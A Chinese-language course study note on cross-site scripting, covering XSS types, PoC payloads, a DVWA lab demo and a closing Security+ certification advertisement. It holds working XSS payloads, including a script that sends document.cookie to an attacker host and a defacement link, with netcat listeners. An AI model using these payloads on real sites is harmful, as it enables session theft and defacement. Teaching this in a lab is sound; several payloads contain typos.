1. 程式人生 > >【安全牛學習筆記】XSS-簡介、跨站腳本檢測和常見的攻擊利用手段2

【安全牛學習筆記】XSS-簡介、跨站腳本檢測和常見的攻擊利用手段2

信息安全 security+ xss

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃XSS ┃

┃攻擊WEB客戶端 ┃

┃客戶端腳本語言 ┃

┃ 彈窗警告、廣告 ┃

┃ Javascript ┃

┃ 在瀏覽器中執行 ┃

┃XSS(cross-site scripting) ┃

┃ 通過WEB站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端的攻擊目的 ┃

┃ 註入客戶端腳本代碼 ┃

┃ 盜取cookie ┃

┃ 重定向 ┃

┃VBScript,ActiveX,or Flash ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃XSS ┃

┃JavaScript ┃

┃ 與Java語言無關 ┃

┃ 命令完全出於市場原因 ┃

┃ 使用最廣的客戶端腳本語言 ┃

┃使用場景 ┃

┃ 直接嵌入html:<script>aler('XSS');</script> ┃

┃ 元素標簽事件: <body onload=alert('XSS')> ┃

┃ 圖片標簽: <img src="javascript:alert('XSS');">┃

┃ 其他標簽: <iframe>,<dir>,and<link> ┃

┃ DOM對象,篡改頁面內容 ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━╋

┃XSS ┃

┃攻擊參與方 ┃

┃ 攻擊者 ┃

┃ 被攻擊者 ┃

┃ 漏洞站點 ┃

┃ 第三方站點(攻擊目標、攻擊參與站) ┃

┃漏洞形成的根源 ┃

┃ 服務器對用戶提交數據過濾不嚴 ┃

┃ 提交給服務器的腳本被直接返回給其他客戶端執行┃

┃ 腳本在客戶端執行惡意操作 ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━╋

┃XSS ┃

┃XSS漏洞類型 ┃

┃ 存儲型(持久型)┃

┃ 反射型(非持久)┃

┃ DOM型 ┃

╋━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃XSS ┃

┃漏洞PoC ┃

┃ <script>alert('xss')</script> ┃

┃ <a href=" onclick=alert('xss')>type</a> ┃

┃ <img src=http://1.1.1.1/a.jpg onerror=alert('xss')> ┃

┃ <script>window.location='http://1.1.1.1'</script> ┃

┃ <iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe> ┃

┃ <script>new ┃

┃ Image().src="http://1.1.1.1/c.php?output="+document.cookie;</script> ┃

┃ <scipt>document.body.innerHTML="<div style=visibility:visible;><hl>THIS ┃

┃ WEBSITE IS UNDER ATTACK</hl></div>";</scirpt> ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# nc -vnlp 80

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃XSS ┃

┃竊取cookie ┃

┃<script src=http://1.1.1.1/a.js></script> ┃

┃a.js源碼 ┃

┃ var img = new Image(); ┃

┃ img.src = "http://1.1.1.1/cookies.php?cookie="+doucument.cookie;┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# vi 1.html

<html>

<head>

<title>my title</title>

</head>

<body>

<a href="http://192.168.1.107/dvwa/vulnerabilites/xss_r/

?name=<script>document.body.innerHTML="<div sytle=visibility:visible;><hl>THIS WEBSITE IS UNDER ATTACK</hl></div>";</script>click</a>

</body>

</html>

root@R:~# cd /var/www/html

root@R:/var/www/html# nc -vnlp 88

root@R:/var/www/html# vi a.js

var img = new Image()

img.src = "http://192.168.1.102:88/cookie.php?cookie="+document.cookie;

該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂


Security+認證為什麽是互聯網+時代最火爆的認證?

牛妹先給大家介紹一下Security+


Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。

Security+認證如此火爆的原因?

原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

原因二: IT運維人員工作與翻身的利器。

在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。


【安全牛學習筆記】XSS-簡介、跨站腳本檢測和常見的攻擊利用手段2